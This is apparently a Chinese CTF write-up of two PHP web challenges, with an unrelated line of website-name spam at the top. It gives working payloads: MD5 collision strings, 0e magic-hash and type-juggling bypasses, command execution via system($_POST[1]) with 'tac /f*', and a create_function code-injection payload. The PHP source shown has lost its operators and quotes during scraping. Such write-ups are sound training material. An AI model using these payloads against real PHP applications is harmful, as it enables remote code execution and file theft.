辽宁省建设厅官方网站,广州住房和城乡建设厅网站首页,招聘网站开发模板,网站建设用什么系统出题友好#xff0c;适合手生复健。
目录
①RCE但是没有完全RCE
②了解过PHP特性吗 ①RCE但是没有完全RCE 上来就是一段md5八股
(string)就是不让用数组了#xff0c;然后强比较需要md5碰撞
?md5_1%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc…出题友好适合手生复健。
目录
①RCE但是没有完全RCE
②了解过PHP特性吗 ①RCE但是没有完全RCE 上来就是一段md5八股
(string)就是不让用数组了然后强比较需要md5碰撞
?md5_1%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%00%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%55%5d%83%60%fb%5f%07%fe%a2md5_2%4d%c9%68%ff%0e%e3%5c%20%95%72%d4%77%7b%72%15%87%d3%6f%a7%b2%1b%dc%56%b7%4a%3d%c0%78%3e%7b%95%18%af%bf%a2%02%a8%28%4b%f3%6e%8e%4b%55%b3%5f%42%75%93%d8%49%67%6d%a0%d1%d5%5d%83%60%fb%5f%07%fe%a2 之后是要md5前后都是0e
post:md5_30e215962017 成功过掉访问3z_RC3.php 这里可能有师傅会想用hex2bin,但编码后会有f和a两个字母不能用限制太大反而弄巧成拙。
所以采用下面这种解法
/3z_RC3.php?cmdsystem($_POST[1]);post:shellurldecode1tac /f*
这里妙就妙在让$shell形同虚设让$cmd自成一个包含函数和参数的完整命令执行。
再要绕waf很自然就想到用$_POST[1]来转接。 ②了解过PHP特性吗
乐开屏一堆PHP特性 这里可能比较难测所以建议自己本地搭一下稍微修改下代码让绕过的进度可视化。
?php
error_reporting(0);
highlight_file(__FILE__);$num $_GET[num];
if (preg_match(/[0-9]/, $num)) {die(no!!);
}
if (intval($num)) {echo 1;
}
if (isset($_POST[ctype]) isset($_POST[is_num])) {$ctype strrev($_POST[ctype]);$is_num strrev($_POST[is_num]);if (ctype_alpha($ctype) is_numeric($is_num) md5($ctype) md5($is_num)) {echo 2;}
}
$_114 $_GET[114];
$_514 $_POST[514];
if (isset($_114) intval($_114) 114514 strlen($_114) 3) {if (!is_numeric($_514) $_514 9999999) {echo 3;}
}
$arr4y $_POST[arr4y];
if (is_array($arr4y)) {for ($i 0; $i count($arr4y); $i) {if ($arr4y[$i] NSS) {die(no!);}$arr4y[$i] intval($arr4y[$i]);}if (array_search(NSS, $arr4y) 0) {echo 4;}
}
第一个是数组绕过preg_match不解释。
第二个是0e绕过弱比较找两个md5后为0e的原字符串因为要求$ctype是字母$is_num是数字当然包括科学计数法
自然可以找到这两个记得要rev一下。
QNKCDZO-OZDCKNQ
0e215962017-710269512e0
第三个是科学计数法含数字字母字符串弱比较
第四个传入一个数组NSS前加个空格可绕过且让array_search可以匹配到NSS可本地试一下
?php$arrarray(1 NSS); //注意NSS前有空格
$keyarray_search(NSS,$arr);
if ($key1){echo success;
}
else echo no!; payload:
?num[]11149e9post:51499999999actypeOZDCKNQis_num710269512e0arr4y[] NSS 访问Rc3_function.php 一眼create_function注入贴出文章不多解释
create_function注入
payload:
shellnss1;}system(tac /f*);/*
